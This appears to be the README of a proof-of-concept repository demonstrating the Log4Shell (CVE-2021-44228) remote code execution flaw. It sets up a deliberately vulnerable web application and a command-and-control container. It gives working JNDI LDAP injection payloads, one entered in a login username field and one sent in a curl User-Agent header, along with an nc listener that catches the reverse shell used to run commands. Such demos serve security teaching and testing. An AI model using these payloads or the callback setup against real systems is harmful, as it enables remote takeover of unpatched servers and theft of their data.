    #
    #
    # ########################################## #
    # #  splatops/log4j-poc/README.md           #
    # ######################################## #
    #
    # Brought to you by...
    # 
    # ::::::::::::'#######::'########:::'######::
    # :'##::'##::'##.... ##: ##.... ##:'##... ##:
    # :. ##'##::: ##:::: ##: ##:::: ##: ##:::..::
    # '#########: ##:::: ##: ########::. ######::
    # .. ## ##.:: ##:::: ##: ##.....::::..... ##:
    # : ##:. ##:: ##:::: ##: ##::::::::'##::: ##:
    # :..:::..:::. #######:: ##::::::::. ######::
    # ::::::::::::.......:::..::::::::::......:::
    #
    ##################################################

# SplatOps ```log4j-poc``` Documentation

## An LDAP RCE exploit for CVE-2021-44228 Log4Shell 

### Description
This repository contains code originally forked from: [CyberXML Github - log4j-poc](https://github.com/cyberxml/log4j-poc).

The content of the original repository has been modified to provide support for a realistic demo scenario.

The attack scenario is made up of two hosts:
* A single host running the ```splatops/log4j-web``` container.
* A single host running the ```splatops/log4j-c2``` container.

For demonstration purposes run ```splatops/log4j-web``` in a controlled and non-Internet accessible environment.  From here the basis is an end user, in the same environment or one that has access to it, will consume the demo financial application.  This container is our public web application.

To make the demonstration realistic the ```splatops/log4j-c2``` is run on the public Internet, ideally in IaaS.  This will run as our PoC and C2 point of reference.  When ```splatops/log4j-web``` is exploited it will call back to this server and will have C2.

### Prerequisites
This demo is setup such that Docker is used to run the containers.  The containers have already been built and housed at the following Docker Hub repositories:
* [splatops/log4j-web](https://hub.docker.com/r/splatops/log4j-web)
* [splatops/log4j-c2](https://hub.docker.com/r/splatops/log4j-c2)

The build source for both containers is in this GitLab repository, but is not required unless container modification is necessary.

### Installation & Configuration
It is recommended to have two VMs/instances available running Ubuntu 18.04 and available for each role.  The instance locations should be as follows:
* ```log4j-web``` - deployed in a protected environment that does not allow direct Internet access, this application is vulnerable!
* ```log4j-c2``` - deployed in an IaaS environment for C2 callback (Digital Ocean, Linode, AWS, Azure, GCP, etc)

Install Docker using the convenience script in both instances, please do not install Docker provided by OS packaging.  The convenience script can be found here, with a short reference to install on Ubuntu 18.04.

* Install Docker - Ubuntu 18.04 for both VMs/instances (log4j-web & log4j-c2):
    * ```curl -fsSL https://get.docker.com -o get-docker.sh```
    * ```sh get-docker.sh```
    * ```sudo usermod -aG docker $USER```
    * Log out and log back in to the instance to obtain group permissions to run Docker commands without ```sudo```.
* On the ```log4j-web``` instance:
    * Pull the ```log4j-web``` container:
        * ```docker pull splatops/log4j-web:1.0```
    * Start the ```log4j-web``` container in host networking mode:
        * ```docker run --rm -d --network host --name log4j-web splatops/log4j-web:1.0```
* On the ```log4j-c2``` instance pull the ```log4j-c2``` container:
    * ```docker pull splatops/log4j-c2:1.0```
* Create a working directory somewhere on the instance, example:
    * ```mkdir ~/log4j-c2/```
* Copy the content from ```env.list``` located here: [env.list](https://gitlab.com/splatops/log4j-poc/-/blob/master/log4j-c2/env.list) to your working directory and into a file named ```env.list```, example:
    * ```cd ~/log4j-c2/ && curl -o env.list https://gitlab.com/splatops/log4j-poc/-/raw/master/log4j-c2/env.list?inline=false```
* Modify the ```env.list``` file with the instance IP address in the placeholders (```[LOG4J-C2-INSTANCE-IP]```), this would look like the following using 1.2.3.4 as an example of your public C2 instance IP:
    * Example ```env.list```:
        ```
        POC_ADDR=1.2.3.4
        POC_PORT=80
        LISTENER_ADDR=1.2.3.4
        LISTENER_PORT=8080
        ```
* Start the ```log4j-c2``` container in host networking mode:
    * _NOTE: Make sure to run this command in the same directory as ```env.list```!_
    * ```docker run --rm -d --network host --name log4j-c2 --env-file ./env.list splatops/log4j-c2:1.0```

Both containers should now be running in host mode on the instances you've deployed and configured.  To validate the containers are running you can issue the following docker command on each host:
* ```docker container ls```
    * Example output:
        ```
        CONTAINER ID   IMAGE                   COMMAND                  CREATED          STATUS          PORTS     NAMES
        81fb008e50f9   splatops/log4j-c2:1.0   "/entrypoint.sh /ent…"   12 seconds ago   Up 11 seconds             log4j-c2
        ```
* _NOTE: Both containers are running in host mode, this allows the running applications to bind directly to host networking ports, so no ports will be listed here but the processes can be seen bound to ports via the application binaries leveraging tools like ```netstat``` or ```ss```_.

### Scenario 1: Run Web App Attack Demo
* Setup a callback listener using ```nc``` on the ```log4j-c2``` instance:
    * ```nc -lv [LOG4J-C2-INSTANCE-IP] 8080```
    * _NOTE: 8080 is the default TCP C2 callback port, if you want to change this make sure the ```env.list``` file was modified and the running container has consumed this prior to setting up the callback listener._
* Navigate to the vulnerable web app on port 8080:
    * _NOTE: Browse to the vulnerable app from a host browser that has access to the internal instance._
    * ```http://[INTERNAL-INSTANCE-IP]:8080/log4shell```
    * Login to show a valid and working application:
        * Enter the username: ```admin```
        * Enter the password: ```password```
        * Select the "login" button
        * See the welcome screen 
    * Return to login at ```http://[INTERNAL-INSTANCE-IP]:8080/log4shell```
        * Enter the username `${jndi:ldap://[LOG4J-C2-INSTANCE-IP]:1389/a}`
        * Select the "login" button
    * Check for a connection on the `nc` listener.
    * Execute commands via the callback channel that is established.

### Scenario 2: Run a User Agent Attack Demo
* Setup a callback listener using ```nc``` on the ```log4j-c2``` instance:
    * ```nc -lv [LOG4J-C2-INSTANCE-IP] 8080```
    * _NOTE: 8080 is the default TCP C2 callback port, if you want to change this make sure the ```env.list``` file was modified and the running container has consumed this prior to setting up the callback listener._
* Make an HTTP request using ```curl``` to trigger the callback:
    * _NOTE: Invoke the request to the vulnerable app from a host that has access to the internal instance._
    * `curl -A "\${jndi:ldap://[LOG4J-C2-INSTANCE-IP]:1389/a}" http://[INTERNAL-INSTANCE-IP]:8080/log4shell`
    * Check for a connection to the `nc` listener.
    * Execute commands via the callback channel that is established.
